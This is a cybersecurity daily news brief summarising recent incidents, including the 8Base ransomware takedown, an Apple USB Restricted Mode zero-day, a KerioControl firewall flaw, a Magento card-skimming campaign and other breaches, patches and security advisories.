Daily Brief

A coordinated operation led by multiple international law enforcement agencies dismantled the 8Base ransomware gang's dark web data leak and negotiation sites. The operation, dubbed "Operation Phobos Aetor," involved the FBI, NCA, Europol, and other agencies from various countries including Germany, Spain, and Japan. Authorities posted a seizure banner on the taken down sites indicating the intervention by the Bavarian State Criminal Police Office and the Office of the Public Prosecutor General in Bamberg. Four European nationals were arrested in Thailand related to the ransomware deployments, specifically targeting companies in Switzerland. Law enforcement seized significant evidence such as mobile phones, laptops, and digital wallets during the arrests. The suspects are believed to have garnered about $16 million through ransomware attacks that affected over 1,000 victims globally. 8Base was identified as employing double extortion techniques, using "Phobos" ransomware elements in its attacks. The operation is part of a broader global effort to disrupt major ransomware operations, following previous disruptions of Hive, LockBit, and BlackCat networks.

Apple released emergency updates for iOS and iPadOS due to an exploited security flaw. The CVE-2025-24200 vulnerability allowed attackers to bypass USB Restricted Mode on locked devices. Attackers needed physical access to the device to exploit the vulnerability. USB Restricted Mode was designed to prevent unauthorized data extraction via digital forensic tools. The specific flaw was addressed through improved state management in the software update. This zero-day vulnerability was reported by The Citizen Lab at the University of Toronto's Munk School. Apple's previous security challenges include attacks using commercial surveillanceware like NSO Group's Pegasus. The update is crucial for users to prevent potential misuse of the security vulnerability.

Apple has patched a significant flaw in USB Restricted Mode in iPhones and iPads, aimed at mitigating sophisticated physical attacks. USB Restricted Mode was designed to disable data ports on devices if locked for over an hour to prevent unauthorized access via physical connections. Despite its 2018 introduction, Apple admitted the mode's vulnerability could still be exploited through highly sophisticated methods. This security loophole has been actively exploited, targeting specific individuals according to Apple's unusually forthright advisory. The flaw pertains to an authorization issue resolved by improved state management as per the National Institute of Standards. Updates have been released for iOS 18.3.1 and iPadOS across multiple device generations, starting from iPhone XS. Noted cybersecurity researcher from Citizen Lab, Bill Marczak, detected these vulnerabilities, urging users to promptly update their devices. These patches underscore ongoing challenges and the delicate balance Apple must maintain between user security and lawful access for investigations.

Over 12,000 instances of GFI KerioControl firewalls are currently exposed to a critical remote code execution vulnerability, identified as CVE-2024-52875. The vulnerability was discovered and demonstrated by security researcher Egidio Romano, showcasing dangerous 1-click RCE attacks. Despite the release of a security patch (version 9.4.5 Patch 1) on December 19, 2024, a significant number of devices remain unpatched and vulnerable. Active exploitation attempts of the vulnerability have been detected, targeting the theft of admin CSRF tokens using Romano's proof-of-concept exploit. The impacted firewalls are predominantly located in countries including Iran, the United States, Italy, Germany, Russia, and Brazil. The flaw allows for HTTP Response Splitting attacks, which can lead to Reflected Cross-Site Scripting (XSS) and further vulnerabilities like 1-click RCEs. GFI Software has released an updated patch (version 9.4.5 Patch 2) on January 31, 2025, to address this and include additional security enhancements.

International law enforcement operations across the US, Europe, and Asia successfully dismantled the 8Base ransomware group, arresting four European suspects in Thailand. The coordinated efforts led to the seizure of the group's dark web portal, which had stolen approximately $16 million from over 1,000 global victims since 2022. Both Europol and the UK's National Crime Agency were actively involved in the operation, with more detailed information expected to be released by Europol. Thai police confiscated significant evidence during the arrests, including phones, cryptocurrency wallets, and laptops, indicating the suspects' technological sophistication. Authorities in Switzerland and the US have requested the extradition of the suspects on charges of conspiracy against the US and wire fraud. The operation, named "Operation Phobos Aetor," suggests potential links between the 8Base group and the previously impacted Phobos ransomware crew. Dark web analysts speculate whether the shutdown of 8Base might be an exit scam, although police involvement indicates that the group has genuinely been compromised. The situation remains fluid, as security researchers watch for potential rebranding or re-emergence of the group under a new guise, similar to tactics seen in other ransomware groups.

Apple released emergency security updates for a zero-day vulnerability identified as CVE-2025-24200, exploited in highly sophisticated attacks. The vulnerability, an authorization issue in iOS and iPadOS, could disable USB Restricted Mode on locked devices. This security flaw impacts both iPhone and iPad users, prompting urgent advice from Apple to install the latest updates. The exploit was disclosed by Citizen Lab and noted for being part of targeted attacks primarily against high-risk individuals including journalists and dissidents. Previous related vulnerabilities, CVE-2023-41061 and CVE-2023-41064, were also uncovered by Citizen Lab and involved zero-click exploits using NSO Group's Pegasus spyware. Apple's quick response includes enhanced state management in iOS 18.3.1 and iPadOS 18.3.1 to address these severe security threats. The company has a history of patching multiple exploited zero-days annually, indicating ongoing vigilance in protecting user security against complex cyber threats.

Eric Council Jr., from Alabama, has pleaded guilty to orchestrating a SIM swap attack that compromised the U.S. Securities and Exchange Commission's (SEC) X account. In January 2024, Council enabled his accomplices to make a false announcement on X about Bitcoin ETFs being approved, causing significant market disruption. The fraudulent post led to a temporary $1,000 increase in Bitcoin's price, which then plunged by $2,000 following a correction tweet from SEC Chairperson Gary Gensler. The attack on the SEC account was executed through the unauthorized takeover of a phone number linked to the X account through SIM swapping. Council and his co-conspirators, who rewarded him with $50,000 in Bitcoin, used a phony identification card and victim information to facilitate the account hijack. Federal probes revealed Council's concerns over an FBI investigation, found from searches on his personal computer. Council's sentencing is set for May 16, and he faces up to five years in prison for his crimes, including conspiracy to commit aggravated identity theft and access device fraud.

Lee Enterprises experienced a significant cyberattack on February 3, 2025, leading to widespread operational disruptions across its U.S. operations. The cyber incident resulted in outages impacting business applications essential for daily newspaper operations including printing and delivery processes. The attack disabled secure network connections (VPNs) and prevented employees including reporters and editors from accessing their working files and systems. Lee Enterprises is actively investigating the extent of information compromised, with ongoing assessments to determine what, if any, sensitive data may have been affected. The company is collaborating with law enforcement to understand the full scope of the cyberattack, while working to restore all affected services. After the cyberattack, Lee's news outlets posted notices on their websites about ongoing maintenance issues affecting access to subscription accounts and e-editions. Lee Enterprises, a major news provider, manages 77 daily and 350 weekly publications, with a significant presence reaching millions in print and digital formats. This incident follows a previous security breach in 2020 involving Iranian hackers right before the U.S. presidential elections, marking ongoing cybersecurity challenges for the company.

A global law enforcement operation, dubbed "Phobos Aetor," targeted and dismantled a significant portion of the Phobos ransomware operation. Four European suspects were arrested in Phuket, Thailand under accusations of launching cyberattacks on over 1,000 victims globally and extorting approximately $16 million in Bitcoin. Authorities conducted coordinated raids at four locations, seizing crucial evidence including laptops, smartphones, and cryptocurrency wallets. The operation resulted in the seizure of the 8Base dark web sites associated with the ransomware attacks, signaling a major disruption in their operations. The suspects allegedly targeted at least 17 Swiss companies, employing tactics that involved data theft, file encryption, and ransom demands paid in cryptocurrency. Law enforcement used cryptocurrency mixing platforms trace evidence which made tracking the ransom payments more challenging. The extensive international collaboration involved multiple countries including Thailand, Romania, Germany, Switzerland, Japan, the USA, and several EU states. The suspects face extradition to Switzerland at the Swiss authorities' request.

Threat actors are using Google Tag Manager to install credit card skimmers on Magento e-commerce platforms. Sucuri reported that hackers disguised the skimming code as typical GTM and Google Analytics scripts, embedding a backdoor for continual access. Initially, six Magento sites were compromised, with current figures showing three still affected by the specific GTM identifier GTM-MLHK2N68. The injected malware operates by inserting an encoded JavaScript within Magento’s "cms_block.content" database table, acting as a skimmer during user checkouts. This malicious script captures credit card data from checkout pages and transmits it to a server under the attackers' control. Sucuri has previously identified GTM being misused for malvertising and also exposed similar vulnerabilities involving WordPress plugins and admin accounts in a separate campaign.

Microsoft has increased the reward payouts of its Copilot AI bug bounty program, now offering up to $5,000 for moderate severity vulnerabilities. The scope of the bug bounty program has been expanded to include a broader range of Copilot consumer products and services, such as Copilot for Telegram and WhatsApp, among others. The initiative aims to enhance the security and reliability of Copilot products by incentivizing the discovery and reporting of vulnerabilities. Rewards for reporting vulnerabilities range from $250 for low-severity issues to $30,000 for critical exploits in various Microsoft environments, including Bing and Windows OS. The expansion allows cybersecurity researchers more opportunities to help secure the expanding Copilot ecosystem. Microsoft's overall cybersecurity efforts, boosted by expansions to its bug bounty programs, are part of a broader Secure Future Initiative. This initiative is a response to a critical review by the U.S. Department of Homeland Security regarding Microsoft’s security practices, pushing the company to enhance its cybersecurity measures across all products.

Lee Enterprises experienced a significant "cybersecurity event" impacting newspaper production across 25 states. Publications affected include reductions in issue size and delays in print and e-editions. The incident, which began on February 3, 2025, led to operational disruptions in automated processes. CEO Kevin Mowbray announced the company is investigating the breach and taking steps to prevent future incidents, with law enforcement notified. Some newspapers like Virginia's Daily Progress and The Buffalo News faced substantial disruption, resulting in reduced publication capabilities. Despite challenges, certain publications like St Louis' Post-Dispatch managed to maintain continuous print publication, albeit in a diminished capacity. Lee Enterprises' financials reported shortly after the event showed a rise in digital revenue, with no immediate reported material impact from the cybersecurity event on operations. The incident is still under evaluation, with recovery and assessment ongoing, and not yet reported to the Securities and Exchange Commission as of the latest update.

Microsoft has identified a significant security threat involving over 3,000 publicly disclosed ASP.NET machine keys susceptible to ViewState code injection attacks. Attackers are utilizing these keys to inject the Godzilla post-exploitation framework, leading to increased risk of malicious code execution. In response to these threats, Microsoft has removed key-related artifacts from its documentation where they were previously included. A separate report by Wiz Research highlights a major AI security risk involving DeepSeek's publicly accessible database, which leaked sensitive information before being secured. Current cybersecurity trends emphasize the importance of updating software to address vulnerabilities listed in the latest CVEs, such as those affecting Zimbra Collaboration and Cisco Identity Services Engine. AI technology adoption poses ongoing privacy and security risks, emphasizing the need for users to maintain secure interactions and manage data permissions effectively. The ongoing evolution of cybersecurity threats requires continuous vigilance, timely updates, and an adaptive security strategy to protect against emerging risks. These incidents underline the critical nature of cybersecurity as a dynamic and ongoing challenge, not a static solution.

Okta is vital for identity governance and security globally, serving over 18,000 customers but its high profile makes it a target for cybercriminals. Recent advisories from Okta highlight increased phishing attempts by entities posing as Okta support to compromise corporate identities and sensitive data. The article outlines six key security configurations in Okta that enhance protection—password policies, phishing-resistant 2FA, ThreatInsight, ASN binding for admin sessions, session lifetime settings, and behavior rules. Continuous monitoring through Security Posture Management (SPM) is recommended to detect and rectify security misconfigurations. SaaS Security Posture Management (SSPM) tools are highlighted as essential for maintaining optimal security across an organization's SaaS ecosystem, enabling quick remediation of security issues. The piece encourages the proactive integration of advanced SaaS security solutions and SSPM capabilities to prevent potential breaches and maintain security efficacy.

Threat actors linked to the DragonRank group have been actively compromising Internet Information Services (IIS) servers across various Asian countries, including India, Thailand, and Japan, for a search engine optimization (SEO) fraud campaign. The campaign involves installing BadIIS malware on the targeted servers, which then modifies the traffic to redirect users to illegal gambling websites and possibly other malicious sites. This SEO manipulation effort is financially motivated and targets sectors such as government, technology, and telecommunications. The compromised servers can alter HTTP response headers based on certain user-agent or referrer fields, redirecting legitimate traffic to unauthorized pages. The DragonRank campaign is associated with previously identified threat groups such as Group 9 and Group 11, who have been known for similar malicious activities in the past using compromised IIS servers. Research findings link the China-based Funnull CDN to infrastructure laundering practices that include renting IPs from major providers like Amazon Web Services and Microsoft Azure for hosting criminal websites. Funnull has been implicated in various cybercrimes including retail phishing, romance scams, and money laundering through deceptive gambling platforms.